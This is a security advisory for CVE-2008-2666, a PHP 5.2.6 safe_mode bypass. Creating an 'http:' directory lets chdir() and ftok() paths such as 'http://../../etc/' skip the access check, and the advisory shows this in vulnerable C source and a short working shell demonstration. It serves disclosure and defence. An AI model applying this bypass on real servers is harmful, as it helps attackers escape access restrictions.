Bug: PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ( Ascii Version )

Search:
WLB2

PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

Published
Credit
Risk
2008.06.17
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-264
CVE-2008-2666
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

CVE: CVE-2008-2666
CWE: CWE-264
Risk: Medium

Affected Software: PHP 5.2.6
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated
pages quickly.

chdir ? Change directory

SYNOPSIS:

bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php


ftok ? Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function

- ---
PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
RETURN_FALSE;
}

if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str
TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);

if (ret != 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
RETURN_FALSE;
}

RETURN_TRUE;
}
- ---

str is beeing checked by safe_mode
example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0
in /www/mb/mb.php on line 8
- ---

in current directory, we should create subdir "http:". => it is possible to create
chdir("http://../../../../../../")
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str
TSRMLS_CC)))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

that same situation with ftok() function (and more)

- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by
uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. We WILL WILL NOT LISTS ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as a main safety

- --- 3. Contact ---
Author: Maksymilian Arciemowicz


References:

References:

http://www.us-cert.gov/cas/techalerts/TA09-133A.html
http://xforce.iss.net/xforce/xfdb/43198
http://www.vupen.com/english/advisories/2009/1297
http://www.securitytracker.com/id?1020328
http://www.securityfocus.com/bid/29796
http://www.securityfocus.com/archive/1/archive/1/501376/100/0/threaded
http://wiki.rpath.com/Advisories:rPSA-2009-0035
http://support.apple.com/kb/HT3549
http://securityreason.com/securityalert/3942
http://securityreason.com/achievement_securityalert/55
http://secunia.com/advisories/35650
http://secunia.com/advisories/35074
http://marc.info/?l=bugtraq&m=125631037611762&w=2
http://marc.info/?l=bugtraq&m=125631037611762&w=2
http://marc.info/?l=bugtraq&m=124654546101607&w=2
http://marc.info/?l=bugtraq&m=124654546101607&w=2
http://lists.apple.com/archives/security-announce/2009/May/msg00002.html

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version